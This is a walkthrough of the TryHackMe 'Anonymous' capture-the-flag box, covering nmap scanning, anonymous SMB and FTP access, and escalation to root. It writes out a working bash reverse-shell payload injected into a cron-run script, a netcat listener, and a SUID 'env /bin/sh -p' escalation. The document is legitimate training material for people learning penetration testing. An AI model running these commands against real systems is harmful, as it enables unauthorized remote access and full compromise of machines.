Introduction

In this walkthrough, I’ll share my approach to solving “Anonymous,” a medium-difficulty Capture The Flag challenge from TryHackMe. This box emphasizes service enumeration, SMB share exploitation, and privilege escalation through Linux misconfigurations. Whether you’re a budding penetration tester or looking to refine your skills, this step-by-step guide will walk you through my process and techniques.

Read it for free.!!!

Step 1: Port Scanning and Service Discovery

The first phase was to identify active services and open ports on the target machine. I initiated a thorough scan using Nmap:

nmap -sCV -vv <target-ip>

Nmap not only revealed detailed information about service versions but also showed that four ports were open on the machine.

• Port 21: FTP
• Port 22: SSH
• Port 445,139: SMB

Step 2: Enumerating SMB Shares

With SMB services identified on ports 139 and 445, the next move was to enumerate available shares on the machine. SMB enumeration can reveal shared resources that might contain sensitive information or allow further access.

To list the shares, I used the following command:

smbclient -L <target-ip>

When prompted, I entered:

• Password: anonymous

Step 3: Exploring FTP and Retrieving Files

After enumerating SMB shares, I focused on the FTP service running on port 21 to look for accessible files and directories.

I connected to FTP using:

ftp <target-ip>

For the login, I used:

• Name: anonymous
• Password: anonymous

Listing the files with ls revealed a directory named scripts. Within this directory, I discovered a file called clean.sh. To analyze its contents and potential for exploitation, I downloaded it to my local machine:

get clean.sh

Step 4: Editing and Re-uploading for a Reverse Shell

With clean.sh downloaded locally, the next step was to edit it and inject a reverse shell payload, leveraging the script’s execution for remote access.

I opened the script with a text editor:

sudo nano clean.sh

Then, I modified the contents to include:

#!/bin/bash
bash -i >& /dev/tcp/<tryhackme-openvpn-ip>/4444 0>&1

After saving the changes, I reconnected to the FTP server and prepared to upload the modified script.

put clean.sh

Before uploading, I started a Netcat listener on my system to catch the incoming connection:

nc -lnvp 4444

Once ready, I uploaded the modified clean.sh back to the server and waited for execution. When triggered, my listener received the reverse shell, granting interactive access to the target machine.

Step 5: Capturing the First Flag

With an interactive shell established, I navigated through the system to search for user-level flags.

Using the reverse shell, I listed files within the home or relevant directories:

ls

This revealed the first flag file, which I promptly captured. Achieving initial shell access and retrieving user flags is a fundamental milestone in any CTF challenge.

Step 6: Privilege Escalation Using SUID Binaries

To elevate privileges, I searched for files with the SUID bit set that are owned by root. These files can sometimes be exploited to gain higher privileges.

I ran the following command:

find / -user root -perm -u=s 2>/dev/null

One interesting file caught my attention: /usr/bin/env.

By executing:

env /bin/sh -p

I was able to spawn a root shell, successfully escalating my privileges.

This was the final step, allowing me to capture the root flag and complete the challenge.

Conclusion

The “Anonymous” TryHackMe box provides an engaging medium-level challenge that ties together essential penetration testing skills: thorough enumeration, SMB share exploration, FTP exploitation, and privilege escalation through SUID binaries. The journey from gaining initial access to escalating privileges offers valuable hands-on experience for aspiring cybersecurity professionals.

Thank you for reading this walkthrough. Stay tuned for more detailed guides, and happy hacking! 😊